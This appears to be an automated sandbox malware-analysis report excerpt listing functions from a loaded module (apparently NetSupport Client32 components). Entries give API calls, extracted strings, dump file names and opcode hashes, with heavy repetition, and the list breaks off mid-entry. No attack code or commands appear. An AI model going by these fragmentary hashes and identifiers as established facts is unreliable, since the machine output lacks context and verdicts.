                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3085755443-3916222277
                                                                                    • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                    • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                    • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                    • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                    Function 1106F060 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 1106F397
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavewsprintf
                                                                                    • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                    • API String ID: 3005300677-3496508882
                                                                                    • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                    • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                    • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                    • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                    Function 11047160 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(?), ref: 11047211
                                                                                    • _malloc.LIBCMT ref: 110472AD
                                                                                    • _memmove.LIBCMT ref: 11047312
                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,00030462,00000005,00000002,00002710,?), ref: 11047372
                                                                                    • _free.LIBCMT ref: 11047379
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                      • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                      • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                      • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                      • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                    • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                    • API String ID: 3960737985-1318765656
                                                                                    • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                    • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                    • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                    • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                    Function 1102D1A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                      • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                    • _memmove.LIBCMT ref: 1102D24A
                                                                                    • _memmove.LIBCMT ref: 1102D26E
                                                                                    • _memmove.LIBCMT ref: 1102D2A8
                                                                                    • _memmove.LIBCMT ref: 1102D2C4
                                                                                    • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                    • String ID: deque<T> too long
                                                                                    • API String ID: 827257264-309773918
                                                                                    • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                    • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                    • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                    • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                    Function 1106B250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                    • String ID: PCIR
                                                                                    • API String ID: 2419779768-1011558323
                                                                                    • Opcode ID: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                    • Instruction ID: 1ccd7dea2f775c367685aa3e1c73f4b59a6156879e869ee7e214f681fe7cb03c
                                                                                    • Opcode Fuzzy Hash: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                    • Instruction Fuzzy Hash: A94106B1F01318ABEB10CFA4DD41BDEB7BEEF81308F104069EC09AB240DA72A901C795
                                                                                    Function 11015500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetPropA.USER32(?,?), ref: 1101556F
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • Part of subcall function 11015290: BeginPaint.USER32(?,?), ref: 110152BF
                                                                                      • Part of subcall function 11015290: GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                      • Part of subcall function 11015290: _memset.LIBCMT ref: 110152E5
                                                                                      • Part of subcall function 11015290: CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                      • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                      • Part of subcall function 11015290: SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                      • Part of subcall function 11015290: BeginPath.GDI32(00000000), ref: 1101532D
                                                                                      • Part of subcall function 11015290: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                      • Part of subcall function 11015290: EndPath.GDI32(00000000), ref: 11015357
                                                                                      • Part of subcall function 11015290: PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                      • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                      • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                      • Part of subcall function 11015290: CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                      • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                      • Part of subcall function 11015290: SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                      • Part of subcall function 11015290: GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                    • GetPropA.USER32(?), ref: 1101557E
                                                                                    • wsprintfA.USER32 ref: 110155B3
                                                                                    • RemovePropA.USER32(?), ref: 110155E8
                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 11015611
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                    • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                    • API String ID: 1924375018-841114059
                                                                                    • Opcode ID: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                    • Instruction ID: fc00b609a2f261b647cf9ab1963ef075e81928135c8218ba30019119ab5d925d
                                                                                    • Opcode Fuzzy Hash: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                    • Instruction Fuzzy Hash: 1131E775E01029ABD714DFA4DC80FBEB379EF4A309F04406AF51A9F148EA7A9940CB71
                                                                                    Function 11005190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                    • _memset.LIBCMT ref: 110051C0
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2755257978-4108050209
                                                                                    • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                    • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                    • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                    • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                    Function 1101D1B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 1101D1E0
                                                                                    • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                    • _memset.LIBCMT ref: 1101D20A
                                                                                    • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                    • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                    • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                    • String ID: NSMChatSizeWnd
                                                                                    • API String ID: 2883038198-4119039562
                                                                                    • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                    • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                    • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                    • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                    Function 1103D160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 1103D18F
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                    • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                    • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                    • String ID: /247$" /a$RunAnnot
                                                                                    • API String ID: 2581068044-4059077130
                                                                                    • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                    • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                    • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                    • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                    Function 1112B270 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E011,?,?,11194244,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112B295
                                                                                    • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112B2AE
                                                                                    • wsprintfA.USER32 ref: 1112B2FB
                                                                                    • wsprintfA.USER32 ref: 1112B313
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,1102E011), ref: 1112B328
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
